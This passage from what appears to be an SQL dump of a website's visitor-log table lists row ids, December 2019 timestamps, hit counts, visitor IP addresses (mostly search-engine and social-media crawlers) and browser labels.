34','chrome'),(467034,1575656432,1,1,0,0,'37.54.16.108','chrome'),(467035,1575657856,1,1,0,0,'66.249.64.26','chrome'),(467036,1575658066,1,1,0,0,'207.46.13.243','other'),(467037,1575658284,1,1,0,0,'91.196.177.231','chrome'),(467038,1575658959,1,1,0,0,'91.196.178.100','chrome'),(467039,1575659128,1,1,0,0,'31.13.127.5','other'),(467040,1575659129,2,2,0,0,'31.13.127.20','other'),(467041,1575659130,1,1,0,0,'31.13.127.10','other'),(467042,1575659248,2,2,0,0,'66.249.64.27','chrome'),(467043,1575659324,1,1,0,0,'207.46.13.179','other'),(467044,1575659497,1,1,0,0,'213.180.203.44','other'),(467045,1575659514,1,1,0,0,'91.196.178.66','firefox'),(467046,1575660236,1,1,0,0,'2.93.79.184','other'),(467047,1575660624,1,1,0,0,'66.249.70.36','chrome'),(467048,1575660874,1,1,0,0,'46.211.215.162','chrome'),(467049,1575661699,1,1,0,0,'91.196.178.170','chrome'),(467050,1575661916,3,3,0,0,'212.90.45.139','firefox'),(467051,1575661917,1,1,0,0,'212.90.45.139','chrome'),(467052,1575663577,1,1,0,0,'141.8.188.12','other'),(467053,1575663614,1,1,0,0,'91.196.178.171','chrome'),(467054,1575663726,1,1,0,0,'213.180.203.37','other'),(467055,1575664076,1,1,0,0,'8.29.198.25','other'),(467056,1575664186,1,1,0,0,'91.209.11.236','other'),(467057,1575664440,1,1,0,0,'31.13.127.10','other'),(467058,1575664441,1,1,0,0,'31.13.127.4','other'),(467059,1575665549,1,1,0,0,'37.54.16.108','chrome'),(467060,1575665812,1,1,0,0,'8.29.198.26','other'),(467061,1575666045,1,1,0,0,'66.249.64.27','chrome'),(467062,1575668797,1,1,0,0,'213.180.203.44','other'),(467063,1575669146,1,1,0,0,'157.55.39.146','other'),(467064,1575669247,1,1,0,0,'66.249.64.27','chrome'),(467065,1575670547,1,1,0,0,'66.249.64.27','chrome'),(467066,1575671189,1,1,0,0,'207.46.13.179','other'),(467067,1575671334,2,2,0,0,'213.180.203.44','other'),(467068,1575671721,1,1,0,0,'91.196.178.25','chrome'),(467069,1575672037,1,1,0,0,'52.162.161.148','other'),(467070,1575672053,1,1,0,0,'157.55.39.239','other'),(467071,1575672447,1,1,0,0,'66.249.64.26','chrome'),(467072,1575674953,1,1,0,0,'8.29.198.27','other'),(467073,1575676137,1,1,0,0,'213.180.203.44','other'),(467074,1575676295,1,1,0,0,'207.46.13.179','other'),(467075,1575676719,1,1,0,0,'8.29.198.26','other'),(467076,1575677127,2,2,0,0,'157.55.39.239','other'),(467077,1575677698,1,1,0,0,'157.55.39.146','other'),(467078,1575678034,1,1,0,0,'207.46.13.243','other'),(467079,1575678298,2,2,0,0,'213.180.203.44','other'),(467080,1575679308,1,1,0,0,'207.46.13.179','other'),(467081,1575681135,1,1,0,0,'213.180.203.44','other'),(467082,1575681481,1,1,0,0,'207.46.13.243','other'),(467083,1575682195,2,2,0,0,'213.180.203.44','other'),(467084,1575682231,1,1,0,0,'66.249.64.26','chrome'),(467085,1575684176,1,1,0,0,'66.249.64.26','chrome'),(467086,1575685819,1,1,0,0,'8.29.198.27','other'),(467087,1575687343,1,1,0,0,'66.249.64.27','chrome'),(467088,1575687385,1,1,0,0,'213.180.203.44','other'),(467089,1575687590,1,1,0,0,'8.29.198.27','other'),(467090,1575688059,1,1,0,0,'207.46.13.243','other'),(467091,1575688346,1,1,0,0,'207.46.13.179','other'),(467092,1575688486,2,2,0,0,'213.180.203.44','other'),(467093,1575689032,1,1,0,0,'51.15.26.26','other'),(467094,1575689417,1,1,0,0,'66.249.64.26','chrome'),(467095,1575689504,1,1,0,0,'213.180.203.44','other'),(467096,1575689546,1,1,0,0,'66.249.64.27','chrome'),(467097,1575690002,1,1,0,0,'207.46.13.179','other'),(467098,1575691567,1,1,0,0,'66.249.64.28','chrome'),(467099,1575693216,1,1,0,0,'213.180.203.37','other'),(467100,1575693589,1,1,0,0,'66.249.64.26','chrome'),(467101,1575693613,1,1,0,0,'66.249.70.36','chrome'),(467102,1575693653,1,1,0,0,'91.209.11.236','other'),(467103,1575694671,1,1,0,0,'213.180.203.44','other'),(467104,1575694963,2,2,0,0,'207.46.13.243','other'),(467105,1575695392,1,1,0,0,'157.55.39.133','other'),(467106,1575695850,1,1,0,0,'46.211.129.38','chrome'),(467107,1575696148,1,1,0,0,'207.46.13.243','other'),(467108,1575696365,2,2,0,0,'157.55.39.239','other'),(467109,1575696397,1,0,1,0,'157.55.39.133',''),(467110,1575696761,1,1,0,0,'8.29.198.25','other'),(467111,1575697039,1,1,0,0,'188.163.44.148','chrome'),(467112,1575697846,1,0,1,0,'207.46.13.243',''),(467113,1575698471,1,1,0,0,'8.29.198.27','other'),(467114,1575698623,1,1,0,0,'31.13.103.23','other'),(467115,1575698625,1,1,0,0,'31.13.103.7','other'),(467116,1575699160,1,1,0,0,'66.249.64.26','chrome'),(467117,1575701413,1,0,1,0,'207.46.13.98',''),(467118,1575701719,1,1,0,0,'46.211.147.13','chrome'),(467119,1575702617,1,1,0,0,'66.249.64.26','chrome'),(467120,1575706690,1,1,0,0,'13.66.139.0','other'),(467121,1575707055,2,2,0,0,'207.46.13.98','other'),(467122,1575707295,1,1,0,0,'66.249.64.27','chrome'),(467123,1575707635,1,1,0,0,'8.29.198.25','other'),(467124,1575708133,1,1,0,0,'31.13.127.8','other'),(467125,1575708134,1,1,0,0,'31.13.127.3','other'),(467126,1575708358,1,1,0,0,'31.13.127.15','other'),(467127,1575708359,1,1,0,0,'31.13.127.5','other'),(467128,1575708561,1,0,1,0,'66.249.64.26',''),(467129,1575709338,1,1,0,0,'8.29.198.27','other'),(467130,1575709676,1,1,0,0,'109.174.113.58','chrome'),(467131,1575710184,1,1,0,0,'213.180.203.44','other'),(467132,1575710188,1,1,0,0,'207.46.13.98','other'),(467133,1575710531,1,1,0,0,'31.13.127.7','other'),(467134,1575710532,1,1,0,0,'91.196.178.46','chrome'),(467136,1575710748,1,1,0,0,'207.46.13.155','other'),(467137,1575711366,1,1,0,0,'213.180.203.44','other'),(467138,1575712663,1,1,0,0,'207.46.13.98','other'),(467139,1575713537,1,1,0,0,'66.249.64.27','chrome'),(467140,1575713799,1,1,0,0,'213.180.203.44','other'),(467141,1575714963,1,1,0,0,'213.180.203.37','other'),(467142,1575716058,1,1,0,0,'46.211.131.38','chrome'),(467143,1575716331,19,19,0,0,'144.76.14.153','other'),(467144,1575716595,11,11,0,0,'198.27.70.196','other'),(467145,1575716705,8,8,0,0,'158.69.243.140','other'),(467146,1575716924,106,106,0,0,'89.163.242.239','other'),(467147,1575717200,2,2,0,0,'207.46.13.155','other'),(467148,1575717269,1,1,0,0,'109.74.154.72','chrome'),(467149,1575717369,1,1,0,0,'91.196.178.41','chrome'),(467150,1575717618,1,1,0,0,'178.63.13.154','other'),(467151,1575717667,6,6,0,0,'158.69.243.140','other'),(467152,1575718441,7,7,0,0,'35.224.83.12','other'),(467153,1575718484,1,1,0,0,'8.29.198.25','other'),(467154,1575719417,1,1,0,0,'207.46.13.98','other'),(467155,1575719614,10,10,0,0,'158.69.243.140','other'),(467156,1575719990,1,1,0,0,'213.180.203.44','other'),(467157,1575720209,1,1,0,0,'8.29.198.25','other'),(467158,1575720228,1,1,0,0,'207.46.13.155','other'),(467159,1575720392,11,11,0,0,'144.76.14.153','other'),(467160,1575720539,11,11,0,0,'158.69.243.140','other'),(467161,1575721043,1,1,0,0,'207.46.13.98','other'),(467162,1575721183,1,1,0,0,'66.249.64.28','chrome'),(467163,1575721471,17,17,0,0,'158.69.243.140','other'),(467164,1575721477,1,1,0,0,'91.218.105.254','firefox'),(467165,1575722174,1,1,0,0,'51.68.152.26','chrome'),(467166,1575722426,13,13,0,0,'158.69.243.140','other'),(467167,1575723211,1,1,0,0,'91.209.11.236','other'),(467168,1575723387,14,14,0,0,'158.69.243.140','other'),(467169,1575724104,85,85,0,0,'89.163.242.161','other'),(467170,1575724308,16,16,0,0,'158.69.243.140','other'),(467171,1575724804,1,1,0,0,'66.249.64.27','chrome'),(467172,1575725032,1,1,0,0,'37.53.8.48','chrome'),(467173,1575725211,12,12,0,0,'158.69.243.140','other'),(467174,1575726156,16,16,0,0,'158.69.243.140','other'),(467175,1575727110,10,10,0,0,'158.69.243.140','other'),(467176,1575727578,1,1,0,0,'157.55.39.144','other'),(467177,1575728015,8,8,0,0,'158.69.243.140','other'),(467178,1575728158,1,1,0,0,'213.180.203.44','other'),(467179,1575728814,1,1,0,0,'66.249.64.26','chrome'),(467180,1575728916,11,11,0,0,'158.69.243.140','other'),(467181,1575729341,1,1,0,0,'8.29.198.25','other'),(467182,1575729798,1,1,0,0,'213.180.203.44','other'),(467183,1575729891,11,11,0,0,'158.69.243.140','other'),(467184,1575729966,1,1,0,0,'207.46.13.197','other'),(467185,1575730903,13,13,0,0,'158.69.243.140','other'),(467186,1575731094,1,1,0,0,'8.29.198.25','other'),(467187,1575731414,1,1,0,0,'207.46.13.155','other'),(467188,1575731811,17,17,0,0,'158.69.243.140','other'),(467189,1575732287,2,2,0,0,'34.68.70.122','chrome'),(467190,1575732310,3,3,0,0,'35.226.128.48','chrome'),(467191,1575732323,6,6,0,0,'35.224.191.162','chrome'),(467193,1575732353,2,2,0,0,'104.197.115.166','chrome'),(467195,1575732791,16,16,0,0,'158.69.243.140','other'),(467196,1575733731,18,18,0,0,'158.69.243.140','other'),(467197,1575734652,14,14,0,0,'158.69.243.140','other'),(467198,1575735586,22,22,0,0,'158.69.243.140','other'),(467199,1575736144,1,1,0,0,'45.55.91.203','chrome'),(467200,1575736161,1,1,0,0,'213.180.203.44','other'),(467201,1575736511,22,22,0,0,'158.69.243.140','other'),(467202,1575736851,1,1,0,0,'207.46.13.197','other'),(467203,1575737008,2,2,0,0,'66.249.64.26','chrome'),(467204,1575737074,1,0,1,0,'157.55.39.144',''),(467205,1575737264,1,1,0,0,'157.55.39.144','other'),(467206,1575737437,13,13,0,0,'158.69.243.140','other'),(467207,1575737546,1,1,0,0,'213.180.203.44','other'),(467208,1575739217,1,1,0,0,'46.211.129.108','chrome'),(467209,1575739760,1,1,0,0,'66.249.64.27','chrome'),(467210,1575739983,7,7,0,0,'178.62.82.141','chrome'),(467211,1575740191,1,1,0,0,'8.29.198.25','other'),(467212,1575740274,1,1,0,0,'91.196.178.183','chrome'),(467213,1575741483,1,1,0,0,'95.108.181.104','other'),(467214,1575741719,1,1,0,0,'157.55.39.144','other'),(467215,1575741979,1,1,0,0,'8.29.198.27','other'),(467216,1575742558,1,1,0,0,'103.115.120.249','chrome'),(467217,1575742679,1,1,0,0,'157.55.39.144','other'),(467218,1575742766,1,1,0,0,'207.46.13.197','other'),(467219,1575743039,1,1,0,0,'213.180.203.37','other'),(467220,1575743732,1,0,1,0,'207.46.13.197',''),(467221,1575744111,2,2,0,0,'213.180.203.44','other'),(467222,1575745527,1,1,0,0,'207.46.13.197','other'),(467223,1575745596,1,1,0,0,'213.180.203.44','other'),(467224,1575745735,1,1,0,0,'66.249.64.28','chrome'),(467225,1575746694,1,0,1,0,'66.249.70.62',''),(467226,1575749271,2,2,0,0,'207.46.13.155','other'),(467227,1575749529,1,1,0,0,'213.180.203.44','other'),(467228,1575749923,1,1,0,0,'37.146.113.227','msie'),(467229,1575750633,1,1,0,0,'94.153.108.184','chrome'),(467230,1575751048,1,1,0,0,'157.55.39.144','other'),(467231,1575751059,1,1,0,0,'8.29.198.27','other'),(467232,1575751073,2,2,0,0,'31.13.127.2','other'),(467233,1575751074,2,2,0,0,'31.13.127.7','other'),(467238,1575752851,1,1,0,0,'8.29.198.25','other'),(467239,1575753168,1,1,0,0,'31.13.127.5','other'),(467240,1575753169,1,1,0,0,'31.13.127.19','other'),(467241,1575753393,1,1,0,0,'213.180.203.44','other'),(467242,1575753717,1,1,0,0,'193.106.30.99','firefox'),(467243,1575754015,1,1,0,0,'207.46.13.155','other'),(467244,1575754448,1,1,0,0,'213.180.203.37','other'),(467245,1575755388,1,1,0,0,'91.196.178.135','chrome'),(467246,1575755844,1,1,0,0,'213.180.203.37','other'),(467247,1575756027,1,1,0,0,'141.8.142.2','other'),(467248,1575756315,2,2,0,0,'91.196.178.135','chrome'),(467249,1575756582,1,1,0,0,'31.13.127.14','other'),(467250,1575756585,1,1,0,0,'31.13.127.21','other'),(467251,1575756586,1,1,0,0,'31.13.127.10','other'),(467252,1575756757,1,1,0,0,'66.249.64.26','chrome'),(467253,1575757184,1,1,0,0,'213.180.203.37','other'),(467254,1575757239,3,3,0,0,'212.90.45.139','firefox'),(467255,1575757241,1,1,0,0,'212.90.45.139','chrome'),(467256,1575758270,1,1,0,0,'207.46.13.197','other'),(467257,1575761546,1,1,0,0,'3.136.84.184','chrome'),(467258,1575761907,1,1,0,0,'8.29.198.27','other'),(467259,1575763705,1,1,0,0,'8.29.198.27','other'),(467260,1575764084,1,1,0,0,'178.154.200.13','other'),(467261,1575764984,1,1,0,0,'141.8.142.119','other'),(467262,1575765047,1,1,0,0,'213.180.203.37','other'),(467263,1575766003,1,1,0,0,'66.249.64.28','chrome'),(467264,1575766483,1,1,0,0,'141.8.132.12','other'),(467265,1575766515,1,1,0,0,'62.205.134.182','other'),(467266,1575766627,1,1,0,0,'66.249.64.26','chrome'),(467267,1575766689,1,1,0,0,'141.8.142.177','other'),(467268,1575766691,1,1,0,0,'157.55.39.244','other'),(467269,1575771259,1,1,0,0,'66.249.70.62','chrome'),(467270,1575772768,1,1,0,0,'8.29.198.27','other'),(467271,1575773556,2,2,0,0,'157.55.39.244','other'),(467272,1575774195,1,1,0,0,'37.9.113.177','other'),(467273,1575774568,1,1,0,0,'8.29.198.27','other'),(467274,1575774818,1,1,0,0,'66.249.64.27','chrome'),(467275,1575775306,1,1,0,0,'91.196.178.130','firefox'),(467276,1575775961,1,1,0,0,'213.180.203.37','other'),(467277,1575776042,1,1,0,0,'178.154.200.13','other'),(467278,1575776099,1,1,0,0,'35.224.83.12','other'),(467279,1575777405,1,1,0,0,'5.45.207.49','other'),(467280,1575783278,1,1,0,0,'141.8.142.177','other'),(467281,1575783401,1,1,0,0,'141.8.142.119','other'),(467282,1575783479,1,1,0,0,'91.196.178.135','chrome'),(467283,1575783625,1,1,0,0,'8.29.198.26','other'),(467284,1575783740,1,1,0,0,'69.171.251.28','other'),(467285,1575783741,1,1,0,0,'173.252.127.33','other'),(467287,1575783751,1,1,0,0,'62.205.134.182','other'),(467288,1575784214,2,2,0,0,'37.55.150.180','chrome'),(467289,1575785425,1,1,0,0,'8.29.198.26','other'),(467290,1575785999,1,1,0,0,'37.9.113.177','other'),(467291,1575787092,1,1,0,0,'37.54.16.108','chrome'),(467292,1575787674,1,1,0,0,'37.9.113.33','other'),(467293,1575787981,1,1,0,0,'141.8.188.25','other'),(467294,1575788466,1,1,0,0,'91.196.178.58','chrome'),(467295,1575788899,2,2,0,0,'207.46.13.187','other'),(467296,1575788976,1,1,0,0,'66.249.64.27','chrome'),(467297,1575789689,1,1,0,0,'37.9.113.10','other'),(467298,1575792204,1,1,0,0,'5.45.207.49','other'),(467299,1575792833,1,1,0,0,'157.55.39.233','other'),(467300,1575793171,2,2,0,0,'207.46.13.187','other'),(467301,1575793406,1,0,1,0,'66.249.70.33',''),(467302,1575794075,1,1,0,0,'141.8.142.164','other'),(467303,1575794200,1,1,0,0,'141.8.188.66','other'),(467304,1575794262,1,1,0,0,'37.9.113.10','other'),(467305,1575794266,1,1,0,0,'178.154.200.71','other'),(467306,1575794269,1,1,0,0,'95.108.181.104','other'),(467307,1575794489,1,1,0,0,'8.29.198.26','other'),(467308,1575794638,1,1,0,0,'157.55.39.233','other'),(467309,1575794718,1,1,0,0,'91.209.11.236','other'),(467310,1575795841,1,1,0,0,'31.13.103.13','other'),(467311,1575795842,1,1,0,0,'31.13.103.22','other'),(467312,1575796288,1,1,0,0,'8.29.198.26','other'),(467313,1575796419,2,2,0,0,'69.58.178.28','other'),(467314,1575796686,1,1,0,0,'188.163.32.162','firefox'),(467315,1575797696,1,1,0,0,'157.55.39.233','other'),(467316,1575798055,1,1,0,0,'178.154.200.13','other'),(467317,1575798264,1,1,0,0,'141.8.142.161','other'),(467318,1575798283,1,1,0,0,'207.46.13.187','other'),(467319,1575799887,2,2,0,0,'66.249.64.28','chrome'),(467320,1575799898,2,2,0,0,'157.55.39.233','other'),(467321,1575800058,1,1,0,0,'95.133.153.3','other'),(467322,1575800141,1,1,0,0,'95.108.181.104','other'),(467323,1575800947,1,1,0,0,'207.46.13.4','other'),(467324,1575801435,1,1,0,0,'157.55.39.233','other'),(467325,1575801779,1,1,0,0,'66.249.64.28','chrome'),(467326,1575803544,2,2,0,0,'157.55.39.233','other'),(467327,1575803885,1,1,0,0,'109.74.154.72','chrome'),(467328,1575804157,1,1,0,0,'66.249.64.27','chrome'),(467329,1575805814,1,1,0,0,'37.52.19.152','chrome'),(467330,1575805912,1,1,0,0,'8.29.198.26','other'),(467331,1575805986,1,1,0,0,'66.249.64.27','chrome'),(467332,1575806119,1,1,0,0,'31.13.127.8','other'),(467333,1575806120,2,2,0,0,'31.13.127.16','other'),(467335,1575806288,1,1,0,0,'207.46.13.146','other'),(467336,1575807124,1,1,0,0,'213.174.21.28','chrome'),(467337,1575807175,1,1,0,0,'8.29.198.27','other'),(467338,1575807196,1,1,0,0,'95.108.181.104','other'),(467339,1575808071,1,1,0,0,'157.55.39.233','other'),(467340,1575808082,1,1,0,0,'207.46.13.146','other'),(467341,1575808512,1,1,0,0,'37.9.113.10','other'),(467342,1575808736,1,1,0,0,'31.13.127.11','other'),(467343,1575808743,3,3,0,0,'31.13.127.8','other'),(467344,1575808744,3,3,0,0,'31.13.127.15','other'),(467345,1575808745,2,2,0,0,'31.13.127.16','other'),(467364,1575808751,1,1,0,0,'91.196.178.135','chrome'),(467365,1575809147,1,1,0,0,'176.108.106.42','firefox'),(467366,1575809481,1,1,0,0,'13.66.139.0','other'),(467367,1575809754,1,1,0,0,'141.8.132.9','other'),(467368,1575809796,1,1,0,0,'157.55.39.233','other'),(467369,1575809823,1,1,0,0,'207.46.13.187','other'),(467370,1575810123,1,1,0,0,'207.46.13.146','other'),(467371,1575810777,2,2,0,0,'31.13.127.13','other'),(467381,1575810778,1,1,0,0,'31.13.127.22','other'),(467389,1575810782,1,1,0,0,'31.13.127.10','other'),(467393,1575811069,1,1,0,0,'39.52.72.177','chrome'),(467394,1575812272,1,1,0,0,'207.46.13.4','other'),(467395,1575812764,1,1,0,0,'157.55.39.233','other'),(467396,1575813785,1,1,0,0,'5.45.207.49','other'),(467397,1575813807,2,0,2,0,'207.46.13.187',''),(467398,1575813823,1,1,0,0,'37.52.19.152','chrome'),(467399,1575814578,2,2,0,0,'37.9.113.33','other'),(467400,1575816056,1,1,0,0,'213.180.203.44','other'),(467401,1575816309,1,1,0,0,'31.13.127.10','other'),(467402,1575816311,1,1,0,0,'31.13.127.14','other'),(467403,1575816898,1,1,0,0,'8.29.198.26','other'),(467404,1575817146,1,1,0,0,'178.251.107.251','chrome'),(467405,1575817318,1,1,0,0,'91.196.178.167','chrome'),(467406,1575818060,1,1,0,0,'8.29.198.25','other'),(467407,1575818242,1,1,0,0,'207.46.13.187','other'),(467408,1575818520,1,1,0,0,'2.93.79.184','other'),(467409,1575818713,1,1,0,0,'130.180.210.40','chrome'),(467410,1575818740,1,1,0,0,'66.249.64.27','chrome'),(467411,1575818898,1,1,0,0,'157.55.39.233','other'),(467412,1575819488,1,1,0,0,'207.46.13.146','other'),(467413,1575820679,1,1,0,0,'130.180.210.40','chrome'),(467414,1575821094,1,1,0,0,'213.180.203.44','other'),(467415,1575823215,1,1,0,0,'91.196.178.46','chrome'),(467416,1575823458,1,1,0,0,'157.55.39.233','other'),(467417,1575823814,1,1,0,0,'109.174.113.33','chrome'),(467418,1575824386,1,1,0,0,'157.55.39.233','other'),(467419,1575827351,1,1,0,0,'213.180.203.44','other'),(467420,1575827740,1,1,0,0,'8.29.198.27','other'),(467421,1575828477,1,1,0,0,'157.55.39.233','other'),(467422,1575828585,1,1,0,0,'46.211.154.188','chrome'),(467423,1575828592,2,2,0,0,'207.46.13.146','other'),(467424,1575828957,1,1,0,0,'8.29.198.25','other'),(467425,1575830297,1,1,0,0,'213.180.203.37','other'),(467426,1575830398,1,1,0,0,'91.221.75.162','firefox'),(467427,1575830413,1,1,0,0,'207.46.13.4','other'),(467428,1575830923,1,1,0,0,'188.163.16.209','chrome'),(467429,1575831279,1,1,0,0,'213.180.203.37','other'),(467430,1575831287,1,1,0,0,'213.180.203.44','other'),(467431,1575831570,1,1,0,0,'66.249.64.26','chrome'),(467432,1575831652,1,1,0,0,'31.13.103.18','other'),(467433,1575831653,1,1,0,0,'31.13.103.14','other'),(467434,1575832822,1,1,0,0,'66.249.64.27','chrome'),(467435,1575835872,1,1,0,0,'91.221.75.162','firefox'),(467436,1575836508,1,1,0,0,'46.219.206.63','chrome'),(467437,1575836974,2,2,0,0,'213.180.203.44','other'),(467438,1575837562,1,1,0,0,'66.249.64.28','chrome'),(467439,1575838589,1,1,0,0,'8.29.198.25','other'),(467440,1575838774,1,1,0,0,'66.249.64.28','chrome'),(467441,1575839278,1,1,0,0,'157.55.39.233','other'),(467442,1575839817,1,1,0,0,'8.29.198.27','other'),(467443,1575840556,1,1,0,0,'207.46.13.187','other'),(467444,1575841193,2,2,0,0,'157.55.39.233','other'),(467445,1575842482,1,1,0,0,'207.46.13.146','other'),(467446,1575843876,1,1,0,0,'213.180.203.37','other'),(467447,1575845326,1,1,0,0,'37.9.113.33','other'),(467448,1575847659,1,1,0,0,'157.55.39.109','other'),(467449,1575848954,1,1,0,0,'157.55.39.109','other'),(467450,1575849132,1,1,0,0,'157.55.39.135','other'),(467451,1575849457,1,1,0,0,'8.29.198.27','other'),(467452,1575850680,1,1,0,0,'8.29.198.26','other'),(467453,1575851610,1,1,0,0,'66.249.64.27','chrome'),(467454,1575852914,2,2,0,0,'157.55.39.109','other'),(467455,1575852915,1,1,0,0,'62.205.134.182','other'),(467456,1575853121,1,1,0,0,'157.55.39.112','other'),(467457,1575853954,1,1,0,0,'178.137.86.189','chrome'),(467458,1575854636,2,0,2,0,'157.55.39.109',''),(467459,1575854695,1,1,0,0,'157.55.39.112','other'),(467460,1575855256,1,1,0,0,'66.249.64.27','chrome'),(467461,1575856353,1,1,0,0,'157.55.39.112','other'),(467462,1575856493,1,1,0,0,'35.172.217.40','other'),(467463,1575857730,1,1,0,0,'157.55.39.109','other'),(467464,1575857981,4,4,0,0,'35.172.217.40','other'),(467465,1575858777,1,1,0,0,'157.55.39.135','other'),(467466,1575859194,1,1,0,0,'157.55.39.109','other'),(467467,1575859229,1,1,0,0,'49.234.7.207','other'),(467468,1575859600,2,2,0,0,'35.172.217.40','other'),(467469,1575860315,1,1,0,0,'8.29.198.26','other'),(467470,1575860533,4,4,0,0,'35.172.217.40','other'),(467471,1575861533,1,1,0,0,'8.29.198.25','other'),(467472,1575862051,2,2,0,0,'35.172.217.40','other'),(467473,1575862077,1,1,0,0,'157.55.39.135','other'),(467474,1575862914,2,2,0,0,'157.55.39.109','other'),(467475,1575865131,3,3,0,0,'157.55.39.135','other'),(467476,1575865555,1,1,0,0,'157.55.39.109','other'),(467477,1575867896,2,2,0,0,'157.55.39.109','other'),(467478,1575868193,1,1,0,0,'157.55.39.112','other'),(467479,1575868777,1,1,0,0,'66.249.64.27','chrome'),(467480,1575869067,1,1,0,0,'157.55.39.109','other'),(467481,1575870047,3,3,0,0,'66.249.64.27','chrome'),(467482,1575870159,2,2,0,0,'66.249.64.28','chrome'),(467483,1575870224,1,1,0,0,'62.205.134.182','other'),(467484,1575870310,1,1,0,0,'213.180.203.44','other'),(467485,1575870883,1,1,0,0,'66.211.229.28','firefox'),(467486,1575871169,1,1,0,0,'8.29.198.26','other'),(467487,1575871653,9,9,0,0,'66.249.83.199','chrome'),(467488,1575871654,1,1,0,0,'46.211.148.61','chrome'),(467489,1575871662,12,12,0,0,'66.249.83.201','chrome'),(467490,1575871663,14,14,0,0,'66.249.83.197','chrome'),(467492,1575871819,2,2,0,0,'66.249.88.143','chrome'),(467493,1575871851,1,1,0,0,'91.196.178.82','firefox'),(467494,1575871852,1,1,0,0,'31.13.103.12','other'),(467497,1575871853,4,4,0,0,'66.102.9.191','chrome'),(467499,1575871859,1,1,0,0,'66.249.88.146','chrome'),(467500,1575871983,2,2,0,0,'66.102.9.161','chrome'),(467502,1575871984,1,1,0,0,'66.249.88.149','chrome'),(467503,1575872399,1,1,0,0,'8.29.198.27','other'),(467504,1575872855,1,1,0,0,'91.196.178.67','chrome'),(467505,1575873170,2,2,0,0,'91.196.178.173','chrome'),(467506,1575874267,1,1,0,0,'91.196.178.187','chrome'),(467507,1575874347,1,1,0,0,'91.124.60.231','chrome'),(467508,1575875234,1,1,0,0,'213.180.203.37','other'),(467509,1575876609,1,1,0,0,'91.196.178.67','chrome'),(467510,1575876869,1,1,0,0,'66.249.64.28','chrome'),(467511,1575876981,1,1,0,0,'178.93.19.197','firefox'),(467512,1575877699,1,1,0,0,'91.196.178.67','chrome'),(467513,1575877826,1,1,0,0,'91.196.178.166','chrome'),(467514,1575878399,1,1,0,0,'178.133.195.224','chrome'),(467515,1575878501,1,1,0,0,'95.132.19.101','chrome'),(467516,1575878723,1,1,0,0,'91.196.178.67','chrome'),(467517,1575879177,4,4,0,0,'91.196.178.173','chrome'),(467518,1575879222,1,1,0,0,'91.196.178.73','chrome'),(467519,1575879611,2,2,0,0,'157.55.39.197','other'),(467520,1575879665,1,1,0,0,'157.55.39.90','other'),(467521,1575880146,1,1,0,0,'91.196.178.173','chrome'),(467522,1575881005,1,1,0,0,'91.196.178.180','chrome'),(467523,1575881305,1,1,0,0,'77.222.134.102','chrome'),(467524,1575881628,1,1,0,0,'91.196.178.173','chrome'),(467525,1575881729,1,1,0,0,'37.52.47.44','chrome'),(467526,1575882029,1,1,0,0,'8.29.198.26','other'),(467527,1575882238,1,1,0,0,'91.196.178.73','chrome'),(467528,1575882617,2,2,0,0,'91.196.178.173','chrome'),(467529,1575882745,1,1,0,0,'91.196.178.87','chrome'),(467530,1575883264,1,1,0,0,'8.29.198.25','other'),(467531,1575883330,1,1,0,0,'91.196.177.110','chrome'),(467532,1575883417,1,1,0,0,'54.36.149.45','other'),(467533,1575884185,1,1,0,0,'91.196.177.46','chrome'),(467534,1575884574,1,1,0,0,'178.94.215.137','firefox'),(467535,1575884679,1,1,0,0,'91.196.178.166','chrome'),(467536,1575885414,1,1,0,0,'18.204.43.86','chrome'),(467537,1575885618,1,1,0,0,'91.196.178.169','chrome'),(467538,1575886234,2,2,0,0,'91.196.178.173','chrome'),(467539,1575886751,1,1,0,0,'46.211.218.225','chrome'),(467540,1575887300,1,1,0,0,'106.38.241.174','other'),(467541,1575887847,1,1,0,0,'91.196.178.189','chrome'),(467542,1575887943,2,2,0,0,'91.196.178.65','chrome'),(467543,1575888390,1,1,0,0,'91.196.178.180','chrome'),(467544,1575888681,1,1,0,0,'157.55.39.197','other'),(467545,1575889002,1,1,0,0,'95.108.181.104','other'),(467546,1575889015,1,1,0,0,'91.196.178.173','chrome'),(467547,1575890438,1,1,0,0,'109.74.154.72','chrome'),(467548,1575891571,2,2,0,0,'91.196.178.169','chrome'),(467549,1575892644,1,1,0,0,'213.180.203.44','other'),(467550,1575892914,2,2,0,0,'157.55.39.197','other'),(467551,1575892923,1,1,0,0,'8.29.198.26','other'),(467552,1575893561,1,1,0,0,'91.196.178.173','chrome'),(467553,1575894033,1,1,0,0,'5.182.98.222','chrome'),(467554,1575894140,1,1,0,0,'8.29.198.26','other'),(467555,1575894699,1,1,0,0,'91.196.177.228','chrome'),(467556,1575894713,2,2,0,0,'66.102.9.164','chrome'),(467557,1575894719,1,1,0,0,'91.196.178.169','chrome'),(467558,1575895435,2,2,0,0,'193.19.84.214','chrome'),(467559,1575895868,1,1,0,0,'89.31.200.12','firefox'),(467560,1575896184,1,1,0,0,'91.196.178.176','chrome'),(467561,1575896219,1,1,0,0,'178.154.200.60','other'),(467562,1575896539,1,1,0,0,'141.8.142.115','other'),(467563,1575896729,1,1,0,0,'46.133.251.133','chrome'),(467564,1575896895,1,1,0,0,'178.133.195.224','chrome'),(467565,1575897705,2,2,0,0,'91.196.178.173','chrome'),(467566,1575897753,3,3,0,0,'91.196.178.166','chrome'),(467567,1575897793,1,1,0,0,'157.55.39.197','other'),(467568,1575897876,1,1,0,0,'91.196.178.169','chrome'),(467569,1575898208,1,1,0,0,'157.55.39.11','other'),(467570,1575898296,2,2,0,0,'176.109.175.210','chrome'),(467571,1575898653,1,1,0,0,'66.249.64.28','chrome'),(467572,1575898881,1,1,0,0,'91.196.178.173','chrome'),(467573,1575899064,1,1,0,0,'141.8.132.37','other'),(467574,1575899543,1,1,0,0,'157.55.39.197','other'),(467575,1575900216,1,1,0,0,'91.196.178.65','chrome'),(467576,1575901063,2,1,1,0,'157.55.39.11',''),(467577,1575901627,1,1,0,0,'91.196.178.129','chrome'),(467578,1575901924,1,1,0,0,'91.196.178.67','chrome'),(467579,1575902139,1,1,0,0,'91.196.178.176','chrome'),(467580,1575902231,1,0,1,0,'157.55.39.11',''),(467581,1575903951,1,1,0,0,'8.29.198.25','other'),(467582,1575904016,1,1,0,0,'2.93.79.184','other'),(467583,1575904278,1,1,0,0,'66.249.64.26','chrome'),(467584,1575904280,1,1,0,0,'5.196.80.103','firefox'),(467585,1575904426,1,1,0,0,'31.13.127.16','other'),(467586,1575904427,5,5,0,0,'31.13.127.14','other'),(467587,1575904428,2,2,0,0,'31.13.127.20','other'),(467588,1575904514,2,0,2,0,'157.55.39.197',''),(467589,1575904522,1,1,0,0,'91.196.178.173','chrome'),(467590,